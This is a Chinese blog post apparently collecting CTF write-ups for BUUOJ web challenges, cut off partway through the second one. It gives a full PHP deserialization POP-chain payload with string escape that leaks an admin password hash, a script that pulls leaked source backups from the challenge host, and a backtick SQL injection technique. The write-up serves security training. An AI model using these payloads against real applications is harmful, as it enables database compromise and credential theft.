<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    
    <!-- title -->
    <title>BUUOJ-web刷题（三）</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <link href="https://fonts.googleapis.com/css?family=Noto+Sans+SC&display=swap" rel="stylesheet">
    <link href="https://cdn.jsdelivr.net/gh/tonsky/FiraCode@2/distr/fira_code.css" rel="stylesheet">
    <!-- rss -->
    
    
<meta name="generator" content="Hexo 4.2.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">Articles</a></li>
         
          <li><a href="/categories/">Category</a></li>
         
          <li><a href="/tags/">Tag</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/2020/03/26/php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%AC%94%E8%AE%B0/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" href="/2020/03/23/SQL%E6%B3%A8%E5%85%A5%E4%B8%80%E4%BA%9Btips%E8%AE%B0%E5%BD%95/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" href="https://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?url=http://yoursite.com/2020/03/25/BUUOJ-web%E5%88%B7%E9%A2%98%EF%BC%88%E4%B8%89%EF%BC%89/&title=BUUOJ-web刷题（三）" target="_blank" rel="noopener"><i class="fab fa-qq " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://service.weibo.com/share/share.php?url=http://yoursite.com/2020/03/25/BUUOJ-web%E5%88%B7%E9%A2%98%EF%BC%88%E4%B8%89%EF%BC%89/&title=BUUOJ-web刷题（三）" target="_blank" rel="noopener"><i class="fab fa-weibo " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://yoursite.com/2020/03/25/BUUOJ-web%E5%88%B7%E9%A2%98%EF%BC%88%E4%B8%89%EF%BC%89/&text=BUUOJ-web刷题（三）" target="_blank" rel="noopener"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=BUUOJ-web刷题（三）&body=Check out this article: http://yoursite.com/2020/03/25/BUUOJ-web%E5%88%B7%E9%A2%98%EF%BC%88%E4%B8%89%EF%BC%89/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#0x-01-GYCTF2020-Easyphp"><span class="toc-number">1.</span> <span class="toc-text">0x 01 [GYCTF2020]Easyphp</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x-02-De1CTF-2019-ShellShellShell"><span class="toc-number">2.</span> <span class="toc-text">0x 02 [De1CTF 2019]ShellShellShell</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x-03-SUCTF-2019-Upload-Labs-2"><span class="toc-number">3.</span> <span class="toc-text">0x 03 [SUCTF 2019]Upload Labs 2</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x-04-GWCTF-2019-mypassword"><span class="toc-number">4.</span> <span class="toc-text">0x 04 [GWCTF 2019]mypassword</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x-05-BSidesCF-2020-Had-a-bad-day"><span class="toc-number">5.</span> <span class="toc-text">0x 05 [BSidesCF 2020]Had a bad day</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x-06-N1CTF-2018-easy-harder-php"><span class="toc-number">6.</span> <span class="toc-text">0x 06 [N1CTF 2018]easy_harder_php</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x-07-SWPUCTF-2016-Web7"><span class="toc-number">7.</span> <span class="toc-text">0x 07 [SWPUCTF 2016]Web7</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        BUUOJ-web刷题（三）
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">John Doe</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2020-03-25T12:37:11.000Z" itemprop="datePublished">2020-03-25</time>
        
        (Updated: <time datetime="2020-04-03T03:11:18.292Z" itemprop="dateModified">2020-04-03</time>)
        
      
    </div>


      
    <div class="article-category">
        <i class="fas fa-archive"></i>
        <a class="category-link" href="/categories/ctfwp/">ctfwp</a>
    </div>


      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link" href="/tags/BUUOJ/" rel="tag">BUUOJ</a>, <a class="tag-link" href="/tags/web/" rel="tag">web</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h3 id="0x-01-GYCTF2020-Easyphp"><a href="#0x-01-GYCTF2020-Easyphp" class="headerlink" title="0x 01 [GYCTF2020]Easyphp"></a>0x 01 [GYCTF2020]Easyphp</h3><ol>
<li>下载<a href="http://www.zip分析源代码，在login.php中ban掉了一大堆关键字，伪协议读取源代码无法实现" target="_blank" rel="noopener">www.zip分析源代码，在login.php中ban掉了一大堆关键字，伪协议读取源代码无法实现</a></li>
</ol>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">$user&#x3D;new user();</span><br><span class="line">if(isset($_POST[&#39;username&#39;]))&#123;</span><br><span class="line">	if(preg_match(&quot;&#x2F;union|select|drop|delete|insert|\#|\%|\&#96;|\@|\\\\&#x2F;i&quot;, $_POST[&#39;username&#39;]))&#123;</span><br><span class="line">		die(&quot;&lt;br&gt;Damn you, hacker!&quot;);</span><br><span class="line">	&#125;</span><br><span class="line">	if(preg_match(&quot;&#x2F;union|select|drop|delete|insert|\#|\%|\&#96;|\@|\\\\&#x2F;i&quot;, $_POST[&#39;password&#39;]))&#123;</span><br><span class="line">		die(&quot;Damn you, hacker!&quot;);</span><br><span class="line">	&#125;</span><br><span class="line">	$user-&gt;login();</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>login()函数来自lib.php。update.php里实例化了一个User()类，并update()。如果$_SESSION[‘login’]===1就输出flag。</p>
<ol start="2">
<li>本题重点就是lib.php了。User类的login()从POST获取username和password后执行查询，将返回结果赋值给SESSION，跳过分析update.php，里面出现了unserialize()函数，这里是本题的关键</li>
</ol>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">public function update()&#123;</span><br><span class="line">        $Info&#x3D;unserialize($this-&gt;getNewinfo());</span><br><span class="line">        $age&#x3D;$Info-&gt;age;</span><br><span class="line">        $nickname&#x3D;$Info-&gt;nickname;</span><br><span class="line">        $updateAction&#x3D;new UpdateHelper($_SESSION[&#39;id&#39;],$Info,&quot;update user SET age&#x3D;$age,nickname&#x3D;$nickname where id&#x3D;&quot;.$_SESSION[&#39;id&#39;]);</span><br><span class="line">        &#x2F;&#x2F;这个功能还没有写完 先占坑</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>先反序列化getNewInfo()返回值，又调用了UpdateHelper()。getNewInfo()代码如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">public function getNewInfo()&#123;</span><br><span class="line">        $age&#x3D;$_POST[&#39;age&#39;];</span><br><span class="line">        $nickname&#x3D;$_POST[&#39;nickname&#39;];</span><br><span class="line">        return safe(serialize(new Info($age,$nickname)));</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>从POST获取age和nickname，返回safe()处理后的Info()序列化结果。safe()简单的将一堆关键字替换成’hacker’，这里会造成反序列化字符逃逸。接下来分析info类</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">class Info&#123;</span><br><span class="line">    public $age;</span><br><span class="line">    public $nickname;</span><br><span class="line">    public $CtrlCase;</span><br><span class="line">    public function __construct($age,$nickname)&#123;</span><br><span class="line">        $this-&gt;age&#x3D;$age;</span><br><span class="line">        $this-&gt;nickname&#x3D;$nickname;</span><br><span class="line">    &#125;</span><br><span class="line">    public function __call($name,$argument)&#123;</span><br><span class="line">        echo $this-&gt;CtrlCase-&gt;login($argument[0]);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>有一个__call的魔术方法，当我们调用一个不存在的方法时会调用CtrlCase-&gt;login()方法，这里我们发现只有dbCtrl类有login()方法还需要一个参数，跟进dbCtrl类有login()方法</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">public function login($sql)</span><br><span class="line">    &#123;</span><br><span class="line">        $this-&gt;mysqli&#x3D;new mysqli($this-&gt;hostname, $this-&gt;dbuser, $this-&gt;dbpass, $this-&gt;database);</span><br><span class="line">        if ($this-&gt;mysqli-&gt;connect_error) &#123;</span><br><span class="line">            die(&quot;连接失败，错误:&quot; . $this-&gt;mysqli-&gt;connect_error);</span><br><span class="line">        &#125;</span><br><span class="line">        $result&#x3D;$this-&gt;mysqli-&gt;prepare($sql);</span><br><span class="line">        $result-&gt;bind_param(&#39;s&#39;, $this-&gt;name);</span><br><span class="line">        $result-&gt;execute();</span><br><span class="line">        $result-&gt;bind_result($idResult, $passwordResult);</span><br><span class="line">        $result-&gt;fetch();</span><br><span class="line">        $result-&gt;close();</span><br><span class="line">        if ($this-&gt;token&#x3D;&#x3D;&#39;admin&#39;) &#123;</span><br><span class="line">            return $idResult;</span><br><span class="line">        &#125;</span><br><span class="line">        if (!$idResult) &#123;</span><br><span class="line">            echo(&#39;用户不存在!&#39;);</span><br><span class="line">            return false;</span><br><span class="line">        &#125;</span><br><span class="line">        if (md5($this-&gt;password)!&#x3D;&#x3D;$passwordResult) &#123;</span><br><span class="line">            echo(&#39;密码错误！&#39;);</span><br><span class="line">            return false;</span><br><span class="line">        &#125;</span><br><span class="line">        $_SESSION[&#39;token&#39;]&#x3D;$this-&gt;name;</span><br><span class="line">        return $idResult;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>这里就可以控制查询语句，把admin账户的密码查出来。得到admin用户的SQL语句不难写<code>select password,username from user where username=?</code>，因为login()返回的是idResult，第一个结果。接下来是想办法触发info类的call方法，回过头看User类，update()函数用到了Info类，UpdateHelper也用到了，但是这些都没有涉及到方法的调用，但是我们发现存在__toString()方法：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">public function __toString()</span><br><span class="line">    &#123;</span><br><span class="line">        $this-&gt;nickname-&gt;update($this-&gt;age);</span><br><span class="line">        return &quot;0-0&quot;;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>nickname哪里来的？unserialize(getNewInfo())得到的，如果nickname是Info类，nickname-&gt;update就会触发Info的<code>__call()</code>方法。接着想办法触发<code>__tostring()</code>方法，我们发现UpdateHelper类的<code>__destruct()</code>方法，会<code>echo $this-&gt;sql</code>，当$sql = new User()时就会触发User类的<code>__toString()</code>魔术方法。接着是构造怎么触发</p>
<p>pop链的思路：利用UpdateHelper类<code>__destruct()</code>触发User类<code>__toString()</code>,利用Info类没有update()触发其<code>__call()</code>，把$this-&gt;CtrlCase实例化成dbCtrl对象，再调用dbCtrl类login()，通过控制查询语句，把admin账户的密码查出来。</p>
<p>完整payload如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">class User</span><br><span class="line">&#123;</span><br><span class="line">    public $id;</span><br><span class="line">    public $age &#x3D; null;</span><br><span class="line">    public $nickname &#x3D; null;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class Info</span><br><span class="line">&#123;</span><br><span class="line">    public $age;</span><br><span class="line">    public $nickname;</span><br><span class="line">    public $CtrlCase;</span><br><span class="line"></span><br><span class="line">    public function __construct($age, $nickname)</span><br><span class="line">    &#123;</span><br><span class="line">        $this-&gt;age &#x3D; $age;</span><br><span class="line">        $this-&gt;nickname &#x3D; $nickname;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">Class UpdateHelper</span><br><span class="line">&#123;</span><br><span class="line">    public $id;</span><br><span class="line">    public $newinfo;</span><br><span class="line">    public $sql;</span><br><span class="line"></span><br><span class="line">    public function __construct($newInfo, $sql)</span><br><span class="line">    &#123;</span><br><span class="line">        $newInfo &#x3D; unserialize($newInfo);</span><br><span class="line">        $upDate &#x3D; new dbCtrl();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class dbCtrl</span><br><span class="line">&#123;</span><br><span class="line">    public $hostname &#x3D; &quot;127.0.0.1&quot;;</span><br><span class="line">    public $dbuser &#x3D; &quot;root&quot;;</span><br><span class="line">    public $dbpass &#x3D; &quot;root&quot;;</span><br><span class="line">    public $database &#x3D; &quot;test&quot;;</span><br><span class="line">    public $name &#x3D; &quot;admin&quot;;</span><br><span class="line">    public $password;</span><br><span class="line">    public $mysqli;</span><br><span class="line">    public $token &#x3D; &quot;admin&quot;;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$db &#x3D; new dbCtrl();</span><br><span class="line">$user &#x3D; new User();</span><br><span class="line">$info &#x3D; new Info(&#39;&#39;,&#39;1&#39;);</span><br><span class="line">#echo serialize($info);</span><br><span class="line">$updatehelper &#x3D; new UpdateHelper(&quot;1&quot;, &quot;&quot;);</span><br><span class="line"></span><br><span class="line">$info-&gt;CtrlCase &#x3D; $db;</span><br><span class="line">$user-&gt;nickname &#x3D; $info;</span><br><span class="line">$user-&gt;age &#x3D; &quot;select password,id from user where username&#x3D;?&quot;;</span><br><span class="line">$updatehelper-&gt;sql &#x3D; $user;</span><br><span class="line">&#x2F;&#x2F; echo serialize($updatehelper);</span><br><span class="line">$c &#x3D; &#39;&quot;;s:8:&quot;CtrlCase&quot;;&#39; . serialize($updatehelper) . &quot;&#125;&quot;;</span><br><span class="line">$length &#x3D; strlen($c);</span><br><span class="line">$c &#x3D; str_repeat(&#39;union&#39;, $length).$c;    &#x2F;&#x2F;一个union被替换成hacker后可以逃逸出一个字符，要是嫌弃union太多可以用’（替换后逃逸五个字符）加上union</span><br><span class="line">echo($c);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>在update.php内post提交age=&amp;nickname=加代码的输出结果，就会得到admin密码的md5值，cmd5解密后登录，得到flag。</p>
<p>参考资料：</p>
<blockquote>
<p><a href="https://blog.csdn.net/weixin_43610673/article/details/104549353" target="_blank" rel="noopener">https://blog.csdn.net/weixin_43610673/article/details/104549353</a></p>
<p><a href="https://tiaonmmn.github.io/2020/03/04/BUUOJ刷题-Web-GYCTF2020-Easyphp/" target="_blank" rel="noopener">https://tiaonmmn.github.io/2020/03/04/BUUOJ%E5%88%B7%E9%A2%98-Web-GYCTF2020-Easyphp/</a></p>
</blockquote>
<h3 id="0x-02-De1CTF-2019-ShellShellShell"><a href="#0x-02-De1CTF-2019-ShellShellShell" class="headerlink" title="0x 02 [De1CTF 2019]ShellShellShell"></a>0x 02 [De1CTF 2019]ShellShellShell</h3><ul>
<li><p>考点</p>
<p>源码泄漏、反序列化、ssrf、代码审计</p>
</li>
<li><p>解题步骤</p>
</li>
</ul>
<ol>
<li>使用dirsearch发现题目存在源码泄露，编写脚本将题目代码保存到本地进行审计</li>
</ol>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">#coding&#x3D;utf-8</span><br><span class="line"># import requests</span><br><span class="line">import urllib</span><br><span class="line">import os</span><br><span class="line">os.system(&#39;mkdir source&#39;)</span><br><span class="line">os.system(&#39;mkdir source&#x2F;views&#39;)</span><br><span class="line">file_list_first&#x3D;[&#39;index.php&#39;,&#39;config.php&#39;,&#39;user.php&#39;]</span><br><span class="line">file_list_second&#x3D;[&#39;views&#x2F;delete&#39;,&#39;views&#x2F;index&#39;,&#39;views&#x2F;login&#39;,&#39;views&#x2F;logout&#39;,&#39;views&#x2F;phpinfo&#39;,&#39;views&#x2F;profile&#39;,&#39;views&#x2F;publish&#39;,&#39;views&#x2F;register&#39;]</span><br><span class="line">part_url&#x3D;&#39;http:&#x2F;&#x2F;5c15c1df-00fd-4ce7-a354-a4e4855c42e4.node3.buuoj.cn&#x2F;&#39;</span><br><span class="line">for i in file_list_first:</span><br><span class="line">    url&#x3D;part_url+i+&#39;~&#39;</span><br><span class="line">    print &#39;download %s &#39;% url</span><br><span class="line">    print os.system(&#39;curl &#39;+url+&#39;&gt;source&#x2F;&#39;+i)</span><br><span class="line">for i in file_list_second:</span><br><span class="line">    url&#x3D;part_url+i</span><br><span class="line">    print &#39;download %s &#39;% url</span><br><span class="line">    print os.system(&#39;curl &#39;+url+&#39;&gt;source&#x2F;&#39;+i+&#39;.php&#39;)</span><br></pre></td></tr></table></figure>

<p>得到如图所示的目录结构</p>
<p><img src="/2020/03/25/BUUOJ-web%E5%88%B7%E9%A2%98%EF%BC%88%E4%B8%89%EF%BC%89/image-20200326194620571.png" alt></p>
<ol start="2">
<li>爆破出验证码之后登陆进去发现有几个功能</li>
</ol>
<p>/index.php?action=profile:</p>
<p><img src="/2020/03/25/BUUOJ-web%E5%88%B7%E9%A2%98%EF%BC%88%E4%B8%89%EF%BC%89/image-20200327103030632.png" alt></p>
<p>/index.php?action=publish:</p>
<p><img src="/2020/03/25/BUUOJ-web%E5%88%B7%E9%A2%98%EF%BC%88%E4%B8%89%EF%BC%89/image-20200327103059191.png" alt></p>
<p>发现可控的参数只有publish页面的signature和mood参数，看一下publish源码:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">if($C-&gt;is_admin&#x3D;&#x3D;0) &#123;</span><br><span class="line">    if (isset($_POST[&#39;signature&#39;]) &amp;&amp; isset($_POST[&#39;mood&#39;])) &#123;</span><br><span class="line">        $res &#x3D; @$C-&gt;publish();</span><br><span class="line">        if($res)&#123;</span><br><span class="line">            echo &quot;&lt;script&gt;alert(&#39;ok&#39;);self.location&#x3D;&#39;index.php?action&#x3D;index&#39;; &lt;&#x2F;script&gt;&quot;;</span><br><span class="line">            exit;</span><br><span class="line">        &#125;</span><br><span class="line">        else &#123;</span><br><span class="line">            echo &quot;&lt;script&gt;alert(&#39;something error&#39;);self.location&#x3D;&#39;index.php?action&#x3D;publish&#39;; &lt;&#x2F;script&gt;&quot;;</span><br><span class="line">            exit;</span><br><span class="line">        &#125;</span><br></pre></td></tr></table></figure>

<p>跟进Customer::publish()方法</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">function publish()</span><br><span class="line">    &#123;</span><br><span class="line">        if(!$this-&gt;check_login()) return false;</span><br><span class="line">        if($this-&gt;is_admin &#x3D;&#x3D; 0)</span><br><span class="line">        &#123;</span><br><span class="line">            if(isset($_POST[&#39;signature&#39;]) &amp;&amp; isset($_POST[&#39;mood&#39;])) &#123;</span><br><span class="line"></span><br><span class="line">                $mood &#x3D; addslashes(serialize(new Mood((int)$_POST[&#39;mood&#39;],get_ip())));</span><br><span class="line">                $db &#x3D; new Db();</span><br><span class="line">                @$ret &#x3D; $db-&gt;insert(array(&#39;userid&#39;,&#39;username&#39;,&#39;signature&#39;,&#39;mood&#39;),&#39;ctf_user_signature&#39;,array($this-&gt;userid,$this-&gt;username,$_POST[&#39;signature&#39;],$mood));</span><br><span class="line">                if($ret)</span><br><span class="line">                    return true;</span><br><span class="line">                else</span><br><span class="line">                    return false;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        ...</span><br></pre></td></tr></table></figure>

<p>接受POST请求的参数，这里$mood被转换为int类型所以只有$signature完全可控，跟进Db::insert()方法</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">public function insert($columns,$table,$values)&#123;</span><br><span class="line"></span><br><span class="line">        $column &#x3D; $this-&gt;get_column($columns);</span><br><span class="line">        $value &#x3D; &#39;(&#39;.preg_replace(&#39;&#x2F;&#96;([^&#96;,]+)&#96;&#x2F;&#39;,&#39;\&#39;$&#123;1&#125;\&#39;&#39;,$this-&gt;get_column($values)).&#39;)&#39;;</span><br><span class="line">        $nid &#x3D;</span><br><span class="line">        $sql &#x3D; &#39;insert into &#39;.$table.&#39;(&#39;.$column.&#39;) values &#39;.$value;</span><br><span class="line">        $result &#x3D; $this-&gt;conn-&gt;query($sql);</span><br><span class="line"></span><br><span class="line">        return $result;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>跟进Db::get_column()方法：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">private function get_column($columns)&#123;</span><br><span class="line">        if(is_array($columns))</span><br><span class="line">            $column &#x3D; &#39; &#96;&#39;.implode(&#39;&#96;,&#96;&#39;,$columns).&#39;&#96; &#39;;</span><br><span class="line">        else</span><br><span class="line">            $column &#x3D; &#39; &#96;&#39;.$columns.&#39;&#96; &#39;;</span><br><span class="line">        return $column;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>会以`,`为连接符操作数组，并在两端加上`符号，相当于先将<code>$value</code>数组的每个值用反引号引起来，然后再用逗号连接起来，变成这样的字符串：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#96;$value[0]&#96;,&#96;$value[1]&#96;，&#96;$value[1]&#96;</span><br></pre></td></tr></table></figure>

<p>接着经过这个正则替换之后将匹配字符串中所有反引号之间的内容，将其取出放到两个单引号里面，然后放入insert语句：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$sql &#x3D; &#39;insert into &#39;.$table.&#39;(&#39;.$column.&#39;) values &#39;.$value;</span><br></pre></td></tr></table></figure>

<p>如果<code>$value</code>元素本身带有反引号，就会破坏掉拼接的结构，在做反引号变为单引号的时候造成问题，比如说:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">考虑$value为 : array(&quot;admin&#96;,&#96;1&#96;)#&quot;,&quot;password&quot;)</span><br><span class="line">经过处理后，就变为了 : (&#39;admin&#39;,&#39;1&#39;)#&#96;,&#39;password&#39; )</span><br><span class="line">相当于闭合了单引号，造成注入。</span><br></pre></td></tr></table></figure>

<p>本地可以测试一下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$columns &#x3D; array(&#39;a&#39;,&#39;b&#39;,&#39;c&#96;,sql)#&#39;,&#39;d&#39;);</span><br><span class="line">if(is_array($columns))</span><br><span class="line">    $column &#x3D; &#39; &#96;&#39;.implode(&#39;&#96;,&#96;&#39;,$columns).&#39;&#96; &#39;;</span><br><span class="line">else</span><br><span class="line">    $column &#x3D; &#39; &#96;&#39;.$columns.&#39;&#96; &#39;;</span><br><span class="line"></span><br><span class="line">echo $column.&quot;&lt;br&gt;&quot;;</span><br><span class="line">echo 